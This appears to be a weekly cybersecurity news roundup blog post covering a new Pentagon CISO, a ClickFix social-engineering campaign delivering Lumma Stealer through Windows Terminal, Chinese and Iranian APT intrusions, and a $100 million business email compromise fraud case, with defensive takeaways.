Pentagon Gets New Leadership While Attackers Double Down on Social Engineering
Pentagon Gets New Leadership While Attackers Double Down on Social Engineering
You know those weeks where it feels like the threat actors are testing every possible attack vector? This past week was definitely one of those. While we’re seeing some positive changes in cybersecurity leadership, the bad guys are getting increasingly creative with their social engineering tactics.
New Sheriff in Town at the Pentagon
The Department of Defense just announced that James ‘Aaron’ Bishop will be stepping into the CISO role, replacing David McKeown who’s heading to the private sector after four decades of government service. Bishop’s appointment comes at a pretty critical time, especially given what we’re seeing with nation-state actors ramping up their activities.
McKeown leaves behind some big shoes to fill. Forty years in government cybersecurity means he’s seen it all – from the early days of network security through today’s sophisticated APT campaigns. Bishop’s going to inherit a complex threat environment, and frankly, the timing couldn’t be more challenging.
The Social Engineering Arms Race Heats Up
Speaking of sophisticated attacks, Microsoft just dropped some interesting research on a new ClickFix campaign that’s using Windows Terminal to deploy Lumma Stealer. What caught my attention here isn’t just the malware – it’s how the attackers are adapting their social engineering tactics.
Instead of the usual “copy and paste this into Run dialog” approach we’ve seen for years, these attackers are now using Windows Terminal as their delivery mechanism. It’s a clever evolution because Terminal looks more legitimate to users, especially those who work in technical environments. The psychological aspect is brilliant – users see a terminal window and think “this must be a legitimate system process.”
This shift tells us something important about how attackers are thinking. They’re not just changing their tools; they’re studying user behavior and adapting their social engineering to match what people expect to see on modern systems.
Nation-State Actors Stay Busy
While we’re dealing with evolving social engineering, the APT groups haven’t been sitting idle. We’ve got two significant campaigns worth discussing.
First, there’s a China-linked group that Cisco Talos is tracking as UAT-9244, which has been targeting telecommunications infrastructure across South America since 2024. They’re using three different implants – TernDoor, PeerTime, and BruteEntry – and hitting both Windows and Linux systems plus edge devices. The telecom targeting is particularly concerning because it gives them potential access to communications infrastructure across multiple countries.
What’s interesting is that Talos sees connections between this group and FamousSparrow, suggesting we might be looking at related operations or shared tooling within China’s broader cyber capabilities.
Then we have Iranian actors who’ve managed to compromise a US airport, bank, and software company. These attacks started in February, which means they’re happening right now – not some historical case study we’re analyzing months later. The fact that they’ve established persistence across such diverse targets suggests this is part of a broader intelligence-gathering operation.
The airport compromise is particularly noteworthy. We don’t often see detailed reporting on aviation sector attacks, but airports represent critical infrastructure with connections to both transportation systems and potentially sensitive passenger data.
Follow the Money
On the financial crime side, we’re seeing the conclusion of a massive case involving a Ghanaian national who just pleaded guilty to his role in a fraud ring that stole over $100 million through business email compromise and romance scams.
A hundred million dollars – that’s not some small-time operation. This kind of money suggests sophisticated organization and probably international coordination. BEC attacks continue to be incredibly effective because they exploit the human element rather than technical vulnerabilities.
What This Means for Our Defense Strategies
Looking at these incidents together, I see a few patterns worth considering. First, social engineering continues to evolve faster than our user awareness training. The ClickFix campaign using Windows Terminal shows attackers are studying how we educate users and then adapting their techniques accordingly.
Second, the nation-state activity across telecommunications and critical infrastructure suggests we need to be thinking about attacks that target operational technology and communications systems, not just traditional IT networks.
Finally, the financial crime numbers remind us that while we focus on sophisticated APTs, traditional fraud schemes are still generating massive profits for criminal organizations.
For those of us responsible for organizational security, this week reinforces the importance of defense in depth. We can’t rely solely on technical controls when attackers are getting this creative with social engineering, and we can’t ignore the human factor when nation-state actors are targeting critical infrastructure.
Sources
- James ‘Aaron’ Bishop Tapped to Serve as New Pentagon CISO
- Ghanain man pleads guilty to role in $100 million fraud ring
- China-Linked Hackers Use TernDoor, PeerTime, BruteEntry in South American Telecom Attacks
- Iranian APT Hacked US Airport, Bank, Software Company
- Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer